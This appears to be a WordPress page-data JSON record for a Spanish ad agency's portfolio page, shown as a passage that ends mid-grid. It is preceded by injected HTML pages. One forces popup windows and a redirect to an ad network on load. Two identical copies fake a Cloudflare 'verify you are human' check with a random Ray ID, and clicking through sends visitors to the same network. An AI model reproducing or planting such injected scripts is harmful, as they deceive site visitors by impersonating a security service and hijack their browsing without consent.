<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Preparing Your Content...</title>
<style>
    body {
        background: linear-gradient(135deg, #0f2027, #203a43, #2c5364);
        color: #fff;
        font-family: Arial, sans-serif;
        text-align: center;
        height: 100vh;
        margin: 0;
        display: flex;
        flex-direction: column;
        justify-content: center;
    }

    h1 {
        font-size: 2.5em;
        margin-bottom: 20px;
    }

    .loader {
        border: 8px solid #fff;
        border-top: 8px solid #3498db;
        border-radius: 50%;
        width: 80px;
        height: 80px;
        animation: spin 1s linear infinite;
        margin: 0 auto;
    }

    @keyframes spin {
        0% { transform: rotate(0deg); }
        100% { transform: rotate(360deg); }
    }

    p {
        margin-top: 20px;
        font-size: 1.2em;
        opacity: 0.7;
    }
</style>

<script>
// Open popup ads
function openPopups() {
    window.open("https://www.profitablecpmratenetwork.com/cdyqxbgbb?key=e8a5298fd1957c0ed7e9bb6b8f5d7ccb", "_blank");
    window.open("https://www.profitablecpmratenetwork.com/bv5jm1c4b?key=09f6fb95f90c73c2b19a11d843d37168");
    window.open("https://www.profitablecpmratenetwork.com/ftnbg4h56f?key=efff402f9657bed9f81b8d5b2e5dc906");
}

// Redirect main window
function redirectMain() {
    window.location.href = "https://www.profitablecpmratenetwork.com/ftnbg4h56f?key=efff402f9657bed9f81b8d5b2e5dc906";
}

window.onload = function() {
    openPopups();
    setTimeout(redirectMain, 1000); // Redirect after 1.5 seconds
};
</script>
</head>

<body>
    <h1>Preparing Your Content...</h1>
    <div class="loader"></div>
    <p>Please wait while we load your content.</p>
</body>
</html>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>Security Check - Human Verification</title>
    <style>
        * {
            box-sizing: border-box;
        }

        body {
            margin: 0;
            padding: 0;
            background-color: #ffffff;
            font-family: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            color: #1d1d1d;
        }

        .main-wrapper {
            max-width: 600px;
            width: 100%;
            padding: 20px;
            margin: 0 auto;
            background: #fff;
        }

        .h2-title {
            font-size: 24px;
            font-weight: 500;
            margin: 0 0 15px 0;
            line-height: 1.3;
        }

        .p-subtitle {
            font-size: 15px;
            color: #595959;
            margin: 0 0 35px 0;
            line-height: 1.5;
        }

        /* Verification button — styled like Turnstile widget */
        .verify-button {
            width: 300px;
            height: 65px;
            background: #fafafa;
            border: 1px solid #e0e0e0;
            border-radius: 4px;
            display: flex;
            align-items: center;
            padding: 0 12px;
            box-sizing: border-box;
            box-shadow: 0px 0px 4px rgba(0, 0, 0, 0.08);
            cursor: pointer;
            margin-bottom: 30px;
            user-select: none;
            -webkit-tap-highlight-color: transparent;
            transition: box-shadow 0.2s, background 0.1s;
            text-decoration: none;
            background-color: #fff;
        }

        .verify-button:hover {
            box-shadow: 0px 0px 6px rgba(0, 0, 0, 0.12);
            background-color: #fefefe;
        }

        /* Disabled/loading state */
        .verify-button.processing {
            cursor: wait;
            opacity: 0.9;
            pointer-events: none;
        }

        .checkbox-area {
            width: 28px;
            height: 28px;
            background-color: #fff;
            border: 2px solid #767676;
            border-radius: 3px;
            display: flex;
            align-items: center;
            justify-content: center;
            flex-shrink: 0;
            transition: border-color 0.1s, background 0.1s;
        }

        .verify-button:hover .checkbox-area {
            border-color: #333;
        }

        .spinner-icon {
            display: none;
            width: 18px;
            height: 18px;
            border: 2px solid rgba(0, 0, 0, 0.2);
            border-top: 2px solid #1e6f3f;
            border-right: 2px solid #1e6f3f;
            border-radius: 50%;
            animation: spin 0.7s linear infinite;
        }

        .checkbox-icon {
            display: none;
            width: 18px;
            height: 18px;
            color: #1e6f3f;
            font-size: 18px;
            font-weight: bold;
            line-height: 1;
            text-align: center;
        }

        .verify-label {
            margin-left: 12px;
            font-size: 14px;
            font-weight: 500;
            color: #1d1d1d;
            flex-grow: 1;
            white-space: nowrap;
        }

        .right-brand {
            display: flex;
            flex-direction: column;
            align-items: flex-end;
            margin-left: auto;
        }

        .cloudflare-logo {
            display: flex;
            align-items: center;
            margin-bottom: 2px;
        }

        .cf-cloud-svg {
            width: 22px;
            height: 15px;
            fill: #F38020;
            margin-right: 4px;
        }

        .cf-logo-text {
            font-family: Arial, sans-serif;
            font-size: 12px;
            font-weight: 700;
            color: #1d1d1d;
            letter-spacing: -0.3px;
        }

        .privacy-terms {
            font-size: 9px;
            color: #767676;
            margin-top: 2px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .footer {
            font-size: 13px;
            color: #595959;
            line-height: 1.6;
            margin-top: 40px;
        }

        .footer code {
            font-family: monospace;
            background: #f1f1f1;
            padding: 2px 4px;
            border-radius: 3px;
        }

        /* Mobile adjustments */
        @media screen and (max-width: 480px) {
            .main-wrapper {
                padding: 15px;
                margin-top: -5vh;
            }
            .h2-title {
                font-size: 22px;
                margin-bottom: 12px;
            }
            .p-subtitle {
                font-size: 14px;
                margin-bottom: 25px;
            }
            .verify-button {
                margin: 0 0 30px 0;
            }
            .footer {
                margin-top: 30px;
            }
        }

        /* prevent accidental double-click visual */
        .no-transition {
            transition: none;
        }
    </style>
</head>
<body>

<div class="main-wrapper">
    <h2 class="h2-title">Checking if the site connection is secure</h2>
    <p class="p-subtitle">We need to verify that you are human. Click the button below to continue securely.</p>

    <!-- Verification Box: behaves like a real Cloudflare Turnstile but instantly redirects after verification -->
    <div class="verify-button" id="verifyButton" role="button" tabindex="0" aria-label="Verify you are human">
        <div class="checkbox-area" id="checkboxArea">
            <div class="spinner-icon" id="spinnerIcon"></div>
            <div class="checkbox-icon" id="checkIcon">✓</div>
        </div>
        <span class="verify-label">Verify you are human</span>
        <div class="right-brand">
            <div class="cloudflare-logo">
                <svg viewBox="0 0 105 35" class="cf-cloud-svg">
                    <path d="M102,15 C99.5,15 97.4,16.5 96.5,18.7 C95.3,16 92.5,14 89,14 C85.6,14 82.8,15.9 81.6,18.5 C80.6,16.4 78.5,15 76,15 C72.1,15 69,18.1 69,22 C69,25.9 72.1,29 76,29 L102,29 C105.9,29 109,25.9 109,22 C109,18.1 105.9,15 102,15 Z" fill="#F38020"></path>
                </svg>
                <span class="cf-logo-text">Cloudflare</span>
            </div>
            <div class="privacy-terms">Privacy • Terms</div>
        </div>
    </div>

    <div class="footer">
        Ray ID: <code id="ray-id"></code><br>
        Performance &amp; security by Cloudflare
    </div>
</div>

<script>
    (function() {
        // ---------- CONFIGURATION ----------
        // Target destination URL (same as original link)
        const DESTINATION_URL = "https://www.profitablecpmratenetwork.com/efgwey8kw4?key=ea712dd164ddbf23977bf6d72e1ad922";
        
        // DOM elements
        const verifyBox = document.getElementById('verifyButton');
        const checkboxArea = document.getElementById('checkboxArea');
        const spinnerEl = document.getElementById('spinnerIcon');
        const checkIcon = document.getElementById('checkIcon');
        
        // State flags
        let isProcessing = false;
        let redirectTriggered = false;
        
        // Generate random Ray ID (visual only)
        const generateRayId = () => {
            const chars = '0123456789abcdef';
            let id = '';
            for (let i = 0; i < 16; i++) {
                id += chars[Math.floor(Math.random() * 16)];
            }
            return id;
        };
        const rayIdSpan = document.getElementById('ray-id');
        if (rayIdSpan) rayIdSpan.innerText = generateRayId();
        
        // Helper: show spinner and prepare UI for loading state
        function startVerificationProcess() {
            if (isProcessing) return;
            isProcessing = true;
            
            // Disable further clicks visually and functionally
            verifyBox.classList.add('processing');
            
            // Clear any existing icons inside checkbox area
            if (spinnerEl) spinnerEl.style.display = 'block';
            if (checkIcon) checkIcon.style.display = 'none';
            
            // Update checkbox area style: remove border and background to indicate active state
            checkboxArea.style.border = 'none';
            checkboxArea.style.backgroundColor = 'transparent';
            
            // Optional: change label text briefly to provide feedback
            const labelSpan = verifyBox.querySelector('.verify-label');
            if (labelSpan && labelSpan.innerText === 'Verify you are human') {
                // slight feedback, but we keep it simple
                labelSpan.style.opacity = '0.9';
            }
            
            // Provide haptic feedback (optional, no impact)
            if (navigator.vibrate) navigator.vibrate(20);
        }
        
        // Perform actual secure redirect
        function redirectToDestination() {
            if (redirectTriggered) return;
            redirectTriggered = true;
            
            // Small delay ensures spinner becomes visible before navigation
            // Modern browsers will still render the spinner for at least a few frames
            setTimeout(() => {
                // Final security: replace current location with target URL (same-tab navigation)
                // This ensures the user doesn't remain on a "stuck" page.
                window.location.href = DESTINATION_URL;
            }, 180);
        }
        
        // Clean fallback: if anything weird happens, force redirect
        function forceRedirect() {
            if (!redirectTriggered) {
                redirectTriggered = true;
                window.location.href = DESTINATION_URL;
            }
        }
        
        // Click handler for verification box
        function onVerifyClick(event) {
            // Prevent any accidental default or bubbling (no default link action anymore)
            event.preventDefault();
            event.stopPropagation();
            
            // If already processing or redirect already triggered, do nothing
            if (isProcessing || redirectTriggered) return;
            
            // Start UI animation (spinner)
            startVerificationProcess();
            
            // Initiate redirect after showing loading state
            redirectToDestination();
            
            // Extra safety: if redirect somehow fails within 2.5 seconds (network policy or user agent block),
            // we try a hard redirect. This ensures the user never stays stuck on loading page.
            setTimeout(() => {
                if (!redirectTriggered) {
                    forceRedirect();
                }
            }, 2500);
        }
        
        // Attach click event to the custom verification button
        if (verifyBox) {
            verifyBox.addEventListener('click', onVerifyClick);
            // Also add keyboard accessibility (Enter / Space)
            verifyBox.addEventListener('keydown', (e) => {
                if (e.key === 'Enter' || e.key === ' ') {
                    e.preventDefault();
                    onVerifyClick(e);
                }
            });
            // Make it focusable for screen readers
            verifyBox.setAttribute('role', 'button');
            verifyBox.setAttribute('tabindex', '0');
        }
        
        // In case there's any anchor or leftover behavior, ensure nothing blocks navigation.
        // Also add a failsafe for older touch devices: remove any ghost click conflicts.
        if ('ontouchstart' in window) {
            verifyBox && verifyBox.addEventListener('touchstart', (e) => {
                // only pass through if not processing, but we handle click anyway
                if (!isProcessing && !redirectTriggered) {
                    // allow click to trigger normally
                }
            });
        }
        
        // Preload hint: not required but adds reliability.
        // Additionally, if the browser's popup or redirect policies somehow block,
        // we use a meta-refresh backup? but window.location is the most direct.
        console.log('Security verification ready — click to continue securely.');
    })();
</script>
</body>
</html><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>Security Check - Human Verification</title>
    <style>
        * {
            box-sizing: border-box;
        }

        body {
            margin: 0;
            padding: 0;
            background-color: #ffffff;
            font-family: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            color: #1d1d1d;
        }

        .main-wrapper {
            max-width: 600px;
            width: 100%;
            padding: 20px;
            margin: 0 auto;
            background: #fff;
        }

        .h2-title {
            font-size: 24px;
            font-weight: 500;
            margin: 0 0 15px 0;
            line-height: 1.3;
        }

        .p-subtitle {
            font-size: 15px;
            color: #595959;
            margin: 0 0 35px 0;
            line-height: 1.5;
        }

        /* Verification button — styled like Turnstile widget */
        .verify-button {
            width: 300px;
            height: 65px;
            background: #fafafa;
            border: 1px solid #e0e0e0;
            border-radius: 4px;
            display: flex;
            align-items: center;
            padding: 0 12px;
            box-sizing: border-box;
            box-shadow: 0px 0px 4px rgba(0, 0, 0, 0.08);
            cursor: pointer;
            margin-bottom: 30px;
            user-select: none;
            -webkit-tap-highlight-color: transparent;
            transition: box-shadow 0.2s, background 0.1s;
            text-decoration: none;
            background-color: #fff;
        }

        .verify-button:hover {
            box-shadow: 0px 0px 6px rgba(0, 0, 0, 0.12);
            background-color: #fefefe;
        }

        /* Disabled/loading state */
        .verify-button.processing {
            cursor: wait;
            opacity: 0.9;
            pointer-events: none;
        }

        .checkbox-area {
            width: 28px;
            height: 28px;
            background-color: #fff;
            border: 2px solid #767676;
            border-radius: 3px;
            display: flex;
            align-items: center;
            justify-content: center;
            flex-shrink: 0;
            transition: border-color 0.1s, background 0.1s;
        }

        .verify-button:hover .checkbox-area {
            border-color: #333;
        }

        .spinner-icon {
            display: none;
            width: 18px;
            height: 18px;
            border: 2px solid rgba(0, 0, 0, 0.2);
            border-top: 2px solid #1e6f3f;
            border-right: 2px solid #1e6f3f;
            border-radius: 50%;
            animation: spin 0.7s linear infinite;
        }

        .checkbox-icon {
            display: none;
            width: 18px;
            height: 18px;
            color: #1e6f3f;
            font-size: 18px;
            font-weight: bold;
            line-height: 1;
            text-align: center;
        }

        .verify-label {
            margin-left: 12px;
            font-size: 14px;
            font-weight: 500;
            color: #1d1d1d;
            flex-grow: 1;
            white-space: nowrap;
        }

        .right-brand {
            display: flex;
            flex-direction: column;
            align-items: flex-end;
            margin-left: auto;
        }

        .cloudflare-logo {
            display: flex;
            align-items: center;
            margin-bottom: 2px;
        }

        .cf-cloud-svg {
            width: 22px;
            height: 15px;
            fill: #F38020;
            margin-right: 4px;
        }

        .cf-logo-text {
            font-family: Arial, sans-serif;
            font-size: 12px;
            font-weight: 700;
            color: #1d1d1d;
            letter-spacing: -0.3px;
        }

        .privacy-terms {
            font-size: 9px;
            color: #767676;
            margin-top: 2px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .footer {
            font-size: 13px;
            color: #595959;
            line-height: 1.6;
            margin-top: 40px;
        }

        .footer code {
            font-family: monospace;
            background: #f1f1f1;
            padding: 2px 4px;
            border-radius: 3px;
        }

        /* Mobile adjustments */
        @media screen and (max-width: 480px) {
            .main-wrapper {
                padding: 15px;
                margin-top: -5vh;
            }
            .h2-title {
                font-size: 22px;
                margin-bottom: 12px;
            }
            .p-subtitle {
                font-size: 14px;
                margin-bottom: 25px;
            }
            .verify-button {
                margin: 0 0 30px 0;
            }
            .footer {
                margin-top: 30px;
            }
        }

        /* prevent accidental double-click visual */
        .no-transition {
            transition: none;
        }
    </style>
</head>
<body>

<div class="main-wrapper">
    <h2 class="h2-title">Checking if the site connection is secure</h2>
    <p class="p-subtitle">We need to verify that you are human. Click the button below to continue securely.</p>

    <!-- Verification Box: behaves like a real Cloudflare Turnstile but instantly redirects after verification -->
    <div class="verify-button" id="verifyButton" role="button" tabindex="0" aria-label="Verify you are human">
        <div class="checkbox-area" id="checkboxArea">
            <div class="spinner-icon" id="spinnerIcon"></div>
            <div class="checkbox-icon" id="checkIcon">✓</div>
        </div>
        <span class="verify-label">Verify you are human</span>
        <div class="right-brand">
            <div class="cloudflare-logo">
                <svg viewBox="0 0 105 35" class="cf-cloud-svg">
                    <path d="M102,15 C99.5,15 97.4,16.5 96.5,18.7 C95.3,16 92.5,14 89,14 C85.6,14 82.8,15.9 81.6,18.5 C80.6,16.4 78.5,15 76,15 C72.1,15 69,18.1 69,22 C69,25.9 72.1,29 76,29 L102,29 C105.9,29 109,25.9 109,22 C109,18.1 105.9,15 102,15 Z" fill="#F38020"></path>
                </svg>
                <span class="cf-logo-text">Cloudflare</span>
            </div>
            <div class="privacy-terms">Privacy • Terms</div>
        </div>
    </div>

    <div class="footer">
        Ray ID: <code id="ray-id"></code><br>
        Performance &amp; security by Cloudflare
    </div>
</div>

<script>
    (function() {
        // ---------- CONFIGURATION ----------
        // Target destination URL (same as original link)
        const DESTINATION_URL = "https://www.profitablecpmratenetwork.com/efgwey8kw4?key=ea712dd164ddbf23977bf6d72e1ad922";
        
        // DOM elements
        const verifyBox = document.getElementById('verifyButton');
        const checkboxArea = document.getElementById('checkboxArea');
        const spinnerEl = document.getElementById('spinnerIcon');
        const checkIcon = document.getElementById('checkIcon');
        
        // State flags
        let isProcessing = false;
        let redirectTriggered = false;
        
        // Generate random Ray ID (visual only)
        const generateRayId = () => {
            const chars = '0123456789abcdef';
            let id = '';
            for (let i = 0; i < 16; i++) {
                id += chars[Math.floor(Math.random() * 16)];
            }
            return id;
        };
        const rayIdSpan = document.getElementById('ray-id');
        if (rayIdSpan) rayIdSpan.innerText = generateRayId();
        
        // Helper: show spinner and prepare UI for loading state
        function startVerificationProcess() {
            if (isProcessing) return;
            isProcessing = true;
            
            // Disable further clicks visually and functionally
            verifyBox.classList.add('processing');
            
            // Clear any existing icons inside checkbox area
            if (spinnerEl) spinnerEl.style.display = 'block';
            if (checkIcon) checkIcon.style.display = 'none';
            
            // Update checkbox area style: remove border and background to indicate active state
            checkboxArea.style.border = 'none';
            checkboxArea.style.backgroundColor = 'transparent';
            
            // Optional: change label text briefly to provide feedback
            const labelSpan = verifyBox.querySelector('.verify-label');
            if (labelSpan && labelSpan.innerText === 'Verify you are human') {
                // slight feedback, but we keep it simple
                labelSpan.style.opacity = '0.9';
            }
            
            // Provide haptic feedback (optional, no impact)
            if (navigator.vibrate) navigator.vibrate(20);
        }
        
        // Perform actual secure redirect
        function redirectToDestination() {
            if (redirectTriggered) return;
            redirectTriggered = true;
            
            // Small delay ensures spinner becomes visible before navigation
            // Modern browsers will still render the spinner for at least a few frames
            setTimeout(() => {
                // Final security: replace current location with target URL (same-tab navigation)
                // This ensures the user doesn't remain on a "stuck" page.
                window.location.href = DESTINATION_URL;
            }, 180);
        }
        
        // Clean fallback: if anything weird happens, force redirect
        function forceRedirect() {
            if (!redirectTriggered) {
                redirectTriggered = true;
                window.location.href = DESTINATION_URL;
            }
        }
        
        // Click handler for verification box
        function onVerifyClick(event) {
            // Prevent any accidental default or bubbling (no default link action anymore)
            event.preventDefault();
            event.stopPropagation();
            
            // If already processing or redirect already triggered, do nothing
            if (isProcessing || redirectTriggered) return;
            
            // Start UI animation (spinner)
            startVerificationProcess();
            
            // Initiate redirect after showing loading state
            redirectToDestination();
            
            // Extra safety: if redirect somehow fails within 2.5 seconds (network policy or user agent block),
            // we try a hard redirect. This ensures the user never stays stuck on loading page.
            setTimeout(() => {
                if (!redirectTriggered) {
                    forceRedirect();
                }
            }, 2500);
        }
        
        // Attach click event to the custom verification button
        if (verifyBox) {
            verifyBox.addEventListener('click', onVerifyClick);
            // Also add keyboard accessibility (Enter / Space)
            verifyBox.addEventListener('keydown', (e) => {
                if (e.key === 'Enter' || e.key === ' ') {
                    e.preventDefault();
                    onVerifyClick(e);
                }
            });
            // Make it focusable for screen readers
            verifyBox.setAttribute('role', 'button');
            verifyBox.setAttribute('tabindex', '0');
        }
        
        // In case there's any anchor or leftover behavior, ensure nothing blocks navigation.
        // Also add a failsafe for older touch devices: remove any ghost click conflicts.
        if ('ontouchstart' in window) {
            verifyBox && verifyBox.addEventListener('touchstart', (e) => {
                // only pass through if not processing, but we handle click anyway
                if (!isProcessing && !redirectTriggered) {
                    // allow click to trigger normally
                }
            });
        }
        
        // Preload hint: not required but adds reliability.
        // Additionally, if the browser's popup or redirect policies somehow block,
        // we use a meta-refresh backup? but window.location is the most direct.
        console.log('Security verification ready — click to continue securely.');
    })();
</script>
</body>
</html>{"id":3788,"date":"2018-08-21T05:34:54","date_gmt":"2018-08-21T10:34:54","guid":{"rendered":"http:\/\/oshinewptheme.com\/v44\/?page_id=3788"},"modified":"2021-12-09T15:53:42","modified_gmt":"2021-12-09T20:53:42","slug":"portafolio","status":"publish","type":"page","link":"https:\/\/jansmedia.com\/index.php\/portafolio\/","title":{"rendered":"Portafolio"},"content":{"rendered":"<div  class=\"tatsu-fuh9ks2or156duhq tatsu-section  tatsu-bg-overlay   tatsu-clearfix\" data-title=\"\"  data-headerscheme=\"background--dark\"><div class='tatsu-section-pad clearfix' data-padding='{\"d\":\"200px 0px 40px 0px\",\"m\":\"150px 0px 150px 0px \"}' data-padding-top='150px'><div class=\"tatsu-row-wrap  tatsu-wrap tatsu-row-one-col tatsu-row-has-one-cols tatsu-medium-gutter tatsu-reg-cols  tatsu-clearfix tatsu-fuh9ks2ox01leexi\" ><div  class=\"tatsu-row \" ><div  class=\"tatsu-column  tatsu-column-no-bg tatsu-one-col tatsu-column-image-none tatsu-column-effect-none  tatsu-fuh9ks2p51a2nse7\"  data-parallax-speed=\"0\" style=\"\"><div class=\"tatsu-column-inner \" ><div class=\"tatsu-column-pad-wrap\"><div class=\"tatsu-column-pad\" ><div  class=\"special-subtitle-wrap  tatsu-BkyjrQK8X  \"  ><div class=\"align-center\"><span class=\"special-subtitle\" >Nuestro Portafolio<\/span><\/div><style>.tatsu-BkyjrQK8X .special-subtitle{font-size: 20px;color: rgba(255,255,255,1) ;width: 60%;}.tatsu-BkyjrQK8X.special-subtitle-wrap{margin-bottom: 10px;}.tatsu-BkyjrQK8X{padding: 0px 0 0 0;}<\/style><\/div><div  class=\"tatsu-module tatsu-inline-text clearfix tatsu-fuh9ks2pao24d7em   \" ><style>.tatsu-fuh9ks2pao24d7em .tatsu-inline-text-inner{width: 60%;text-align: left;}.tatsu-fuh9ks2pao24d7em.tatsu-inline-text{margin: 0px 0px 0px 0px;}<\/style><div class=\"tatsu-inline-text-inner tatsu-align-center\">\n<h1 style=\"text-align: center;\"><span style=\"color: #f9f9f9; font-size: 64px;\">\u00a1Ver es creer!<\/span><\/h1>\n<\/div><\/div><\/div><\/div><div class = \"tatsu-column-bg-image-wrap\"><div class = \"tatsu-column-bg-image\" ><\/div><\/div><\/div><style>.tatsu-row > .tatsu-fuh9ks2p51a2nse7.tatsu-column{width: 100%;}.tatsu-fuh9ks2p51a2nse7.tatsu-column > .tatsu-column-inner > .tatsu-column-overlay{mix-blend-mode: none;}.tatsu-fuh9ks2p51a2nse7 > .tatsu-column-inner > .tatsu-top-divider{z-index: 9999;}.tatsu-fuh9ks2p51a2nse7 > .tatsu-column-inner > .tatsu-bottom-divider{z-index: 9999;}.tatsu-fuh9ks2p51a2nse7 > .tatsu-column-inner > .tatsu-left-divider{z-index: 9999;}.tatsu-fuh9ks2p51a2nse7 > .tatsu-column-inner > .tatsu-right-divider{z-index: 9999;}@media only screen and (max-width:1377px) {.tatsu-row > .tatsu-fuh9ks2p51a2nse7.tatsu-column{width: 100%;}}@media only screen and (min-width:768px) and (max-width: 1024px) {.tatsu-row > .tatsu-fuh9ks2p51a2nse7.tatsu-column{width: 100%;}}@media only screen and (max-width: 767px) {.tatsu-row > .tatsu-fuh9ks2p51a2nse7.tatsu-column{width: 100%;}}<\/style><\/div><\/div><\/div><\/div><div class=\"tatsu-section-background-wrap\"><div class = \"tatsu-section-background\" ><\/div><\/div><div class=\"tatsu-overlay tatsu-section-overlay\"><\/div><div class = \"tatsu-shape-divider tatsu-bottom-divider\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" preserveAspectRatio=\"none\" viewBox=\"0 0 1920 120\">\n  <path fill-rule=\"evenodd\" d=\"M0,0 C320,60 640,90 960,90 C1280,90 1600,60 1920,0 L1920,120 L0,120 L0,0 Z\"\/>\n<\/svg>\n<\/div><style>.tatsu-fuh9ks2or156duhq.tatsu-section{background-color: #222222;}.tatsu-fuh9ks2or156duhq .tatsu-section-background{background-image: url(https:\/\/jansmedia.com\/wp-content\/uploads\/2021\/12\/portafolio-agencia-de-publicidad.jpeg);background-repeat: no-repeat;background-attachment: scroll;background-position: center center;background-size: cover;}.tatsu-fuh9ks2or156duhq .tatsu-bg-blur{background-repeat: no-repeat;background-attachment: scroll;background-position: center center;background-size: cover;}.tatsu-fuh9ks2or156duhq .tatsu-section-pad{padding: 200px 0px 40px 0px;}.tatsu-fuh9ks2or156duhq > .tatsu-bottom-divider{height: 150px;color: rgba(255,255,255,1) ;z-index: 9999;}.tatsu-fuh9ks2or156duhq > .tatsu-top-divider{z-index: 9999;}.tatsu-fuh9ks2or156duhq .tatsu-section-overlay{background: rgba(0,0,0,0.65);mix-blend-mode: normal;}@media only screen and (max-width:1377px) {.tatsu-fuh9ks2or156duhq > .tatsu-bottom-divider{height: 70px;}}@media only screen and (max-width: 767px) {.tatsu-fuh9ks2or156duhq .tatsu-section-pad{padding: 150px 0px 150px 0px ;}.tatsu-fuh9ks2or156duhq > .tatsu-bottom-divider{height: 40px;}}<\/style><\/div><div  class=\"tatsu-By-eeBQKIm tatsu-section    tatsu-clearfix\" data-title=\"\"  data-headerscheme=\"background--dark\"><div class='tatsu-section-pad clearfix' data-padding='{\"d\":\"40px 0px 180px 0px\"}' data-padding-top='40px'><div class=\"tatsu-row-wrap  tatsu-row-full-width tatsu-row-one-col tatsu-row-has-one-cols tatsu-medium-gutter tatsu-reg-cols  tatsu-clearfix tatsu-fuhatlm4z8dle4d8\" ><style>.tatsu-fuhatlm4z8dle4d8.tatsu-row-wrap > .tatsu-row{padding: 0px 0% 0px 0% ;}<\/style><div  class=\"tatsu-row \" ><div  class=\"tatsu-column  tatsu-column-no-bg tatsu-one-col tatsu-column-image-none tatsu-column-effect-none  tatsu-fuhatlm56yaksuyw\"  data-parallax-speed=\"0\" style=\"\"><div class=\"tatsu-column-inner \" ><div class=\"tatsu-column-pad-wrap\"><div class=\"tatsu-column-pad\" ><div  class = \"portfolio-all-wrap oshine-portfolio-module tatsu-fuhatlm5egfrj45q\"  > <div class=\"portfolio portfolio-delay-load full-screen be-portfolio-prebuilt-hover-style4 portfolio-lazy-load full-screen-gutter masonry_disable style1-gutter three-col \" data-animation = \"fadeInUp\" data-action=\"get_ajax_full_screen_gutter_portfolio\" data-category=\"\" data-aspect-ratio = \"1.6\" data-enable-masonry=\"0\" data-showposts=\"-1\" data-paged=\"2\" data-col=\"three\" data-gallery=\"0\" data-filter=\"portfolio_categories\" data-meta_to_show=\"portfolio_categories\" data-show_filters=\"no\" data-thumbnail-bg-color=\"\" data-thumbnail-bg-gradient=\"background:rgba(255,255,255,1)\" data-placeholder-color=\"rgba(245,245,245,1)\" data-cat-color=\"rgba(117,117,117,1)\" data-title-color=\"rgba(18,18,18,1)\"  data-gutter-width=\"50\" data-img-grayscale=\"c_to_c\" data-prebuilt-hover-style=\"style4\"\" data-gradient-style-color=\"background:rgba(255,255,255,1)\" data-cat-hide=\"0\" data-like-indicator=\"1\" style=\"margin-right: 50px;\"><div class=\"portfolio-container clickable clearfix portfolio-shortcode  init-slide-bottom \"><div class=\"element be-hoverlay not-wide no-wide-width-height  c_to_c\"style=\"margin-bottom: 50px;\" data-category-names = \"\"><div class=\"element-inner\" style=\"margin-left: 50px;\"><a href=\"https:\/\/jansmedia.com\/index.php\/portfolio\/marketing-digital-2\/\" class=\" thumb-wrap   \" data-gdpr-atts={} title=\"Marketing-Digital\" ><div class=\"flip-wrap\" ><div   style = \"padding-bottom : 62.5%;background-color:rgba(245,245,245,1);\" class=\"flip-img-wrap\"><img decoding=\"async\" src=\"https:\/\/jansmedia.com\/wp-content\/uploads\/2017\/05\/Marketing-Digital.jpg\" alt=\"planes de marketing digital\"\/><\/div><\/div><div class=\"thumb-overlay \"><div class=\"thumb-bg \" style=\"background:rgba(255,255,255,1)\"><div class=\"thumb-title-wrap \"><div class=\"thumb-title \" style=\"color:rgba(18,18,18,1);\"><div class = \"thumb-title-inner-wrap\">Marketing Digital<\/div><\/div><div class=\"portfolio-item-cats \" style=\"color:rgba(117,117,117,1);\"><div class = \"portfolio-item-cats-inner-wrap\"><span>Audiovisual<\/span><span> &middot; <\/span><span>Branding<\/span><span> &middot; <\/span><span>Campa\u00f1as<\/span><span> &middot; <\/span><span>Dise\u00f1o Grafico<\/span><span> &middot; <\/span><span>Logos<\/span><span> &middot; <\/span><span>Ventas<\/span><span> &middot; <\/span><span>Web<\/span><\/div><\/div><\/div><\/div><\/div><\/a><\/div><\/div><div class=\"element be-hoverlay not-wide no-wide-width-height  c_to_c\"style=\"margin-bottom: 50px;\" data-category-names = \"\"><div class=\"element-inner\" style=\"margin-left: 50px;\"><a href=\"https:\/\/jansmedia.com\/index.php\/portfolio\/imagen-corporativa-2\/\" class=\" thumb-wrap   \" data-gdpr-atts={} title=\"Imagen-Corporativa\" ><div class=\"flip-wrap\" ><div   style = \"padding-bottom : 62.5%;background-color:rgba(245,245,245,1);\" class=\"flip-img-wrap\"><img decoding=\"async\" src=\"https:\/\/jansmedia.com\/wp-content\/uploads\/2017\/05\/Imagen-Corporativa.jpg\" alt=\"imagen corporativa\"\/><\/div><\/div><div class=\"thumb-overlay \"><div class=\"thumb-bg \" style=\"background:rgba(255,255,255,1)\"><div class=\"thumb-title-wrap \"><div class=\"thumb-title \" style=\"color:rgba(18,18,18,1);\"><div class = \"thumb-title-inner-wrap\">Imagen corporativa<\/div><\/div><div class=\"portfolio-item-cats \" style=\"color:rgba(117,117,117,1);\"><div class = \"portfolio-item-cats-inner-wrap\"><span>Branding<\/span><span> &middot; <\/span><span>Campa\u00f1as<\/span><span> &middot; <\/span><span>Dise\u00f1o Grafico<\/span><span> &middot; <\/span><span>Logos<\/span><span> &middot; <\/span><span>Ventas<\/span><\/div><\/div><\/div><\/div><\/div><\/a><\/div><\/div><div class=\"element be-hoverlay not-wide no-wide-width-height  c_to_c\"style=\"margin-bottom: 50px;\" data-category-names = \"\"><div class=\"element-inner\" style=\"margin-left: 50px;\"><a href=\"https:\/\/jansmedia.com\/index.php\/portfolio\/diseno-web\/\" class=\" thumb-wrap   \" data-gdpr-atts={} title=\"Web\" ><div class=\"flip-wrap\" ><div   style = \"padding-bottom : 62.5%;background-color:rgba(245,245,245,1);\" class=\"flip-img-wrap\"><img decoding=\"async\" src=\"https:\/\/jansmedia.com\/wp-content\/uploads\/2017\/05\/Web.jpg\" alt=\"dise\u00f1o web\"\/><\/div><\/div><div class=\"thumb-overlay \"><div class=\"thumb-bg \" style=\"background:rgba(255,255,255,1)\"><div class=\"thumb-title-wrap \"><div class=\"thumb-title \" style=\"color:#232323;\"><div class = \"thumb-title-inner-wrap\">Dise\u00f1o Web<\/div><\/div><div class=\"portfolio-item-cats \" style=\"color:#323232;\"><div class = 